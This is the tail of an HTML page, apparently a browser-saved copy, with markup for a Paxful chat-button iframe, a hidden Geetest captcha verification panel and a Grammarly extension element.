        class="ada-button-frame"
        aria-roledescription="Paxful Chat Button"
        role="application"
        style="
          position: fixed;
          z-index: 10000;
          overflow: hidden;
          visibility: visible;
          opacity: 1;
          transition: visibility 250ms ease 0s, opacity 250ms ease 0s,
            transform 250ms ease 0s;
          right: 0px;
          bottom: 0px;
          transform: translate(0px, 0px);
          width: 92px;
          height: 92px;
        "
      ></iframe>
    </div>
    <div class="geetest_panel geetest_wind" style="display: none">
      <div class="geetest_panel_ghost"></div>
      <div class="geetest_panel_box">
        <div class="geetest_other_offline geetest_panel_offline"></div>
        <div class="geetest_panel_loading">
          <div class="geetest_panel_loading_icon"></div>
          <div class="geetest_panel_loading_content">Verifying</div>
        </div>
        <div class="geetest_panel_success">
          <div class="geetest_panel_success_box">
            <div class="geetest_panel_success_show">
              <div class="geetest_panel_success_pie"></div>
              <div class="geetest_panel_success_filter"></div>
              <div class="geetest_panel_success_mask"></div>
            </div>
            <div class="geetest_panel_success_correct">
              <div class="geetest_panel_success_icon"></div>
            </div>
          </div>
          <div class="geetest_panel_success_title">Verification Succeeded</div>
        </div>
        <div class="geetest_panel_error">
          <div class="geetest_panel_error_icon"></div>
          <div class="geetest_panel_error_title">Timed out</div>
          <div class="geetest_panel_error_content">Retry</div>
          <div class="geetest_panel_error_code">
            <div class="geetest_panel_error_code_text"></div>
          </div>
        </div>
        <div class="geetest_panel_footer">
          <div class="geetest_panel_footer_logo"></div>
          <div class="geetest_panel_footer_copyright">Powered by Geetest</div>
        </div>
        <div class="geetest_panel_next"></div>
      </div>
    </div>

    <!--End of paxful code-->
  </body>
  <grammarly-desktop-integration
    data-grammarly-shadow-root="true"
  ></grammarly-desktop-integration>
</html>
